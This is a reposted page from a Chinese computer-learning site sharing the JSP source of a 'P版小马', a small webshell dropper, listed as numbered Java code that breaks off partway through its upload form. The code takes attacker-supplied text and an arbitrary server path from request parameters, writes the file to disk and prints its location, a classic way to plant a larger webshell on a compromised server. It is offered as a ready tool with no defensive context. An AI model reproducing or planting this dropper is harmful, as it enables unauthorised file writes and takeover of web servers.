P版小马

来源:韦江代博客 责任编辑:栏目编辑 发表时间:2013-07-02 06:49 点击:
Java代码
  1. <%@page contentType="text/html;charset=gb2312"%>   
  2. <%@page import="java.io.*,java.util.*,java.net.*"%>   
  3. <html>   
  4.    <head>   
  5.      <title>JspDo Code By Xiao.3</title>   
  6.      <style type="text/css">   
  7.       body { color:red; font-size:12px; background-color:white; }   
  8.      </style>   
  9.    </head>   
  10.    <body>   
  11.    <%   
  12.     if(request.getParameter("context")!=null)   
  13.     {   
  14.     String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312");   
  15.     String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312");   
  16.     OutputStream pt = null;   
  17.          try {   
  18.              pt = new FileOutputStream(path);   
  19.              pt.write(context.getBytes());   
  20.              out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='点击可以转到上传的文件页面!'>上传成功!</font></a>");   
  21.          } catch (FileNotFoundException ex2) {   
  22.              out.println("<font color='red'>上传失败!</font>");   
  23.          } catch (IOException ex) {   
  24.              out.println("<font color='red'>上传失败!</font>");   
  25.          } finally {   
  26.              try {   
  27.                  pt.close();   
  28.              } catch (IOException ex3) {   
  29.                  out.println("<font color='red'>上传失败!</font>");   
  30.              }   
  31.          }   
  32. }   
  33.    %>   
  34.      <form name="frmUpload" method="post" action="">   
  35.      <font color="blue">本文件的路径:</font><%out.print(request.getRealPath(request.getServletPath())); %>   
  36.  
    发表评论
    请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
    用户名: 验证码:点击我更换图片
    最新评论 更多>>
    网站首页 - 友情链接 - 网站地图 - TAG标签 - RSS订阅 - 内容搜索
    Copyright © 2008-2015 计算机技术学习交流网. 版权所有

    豫ICP备11007008号-1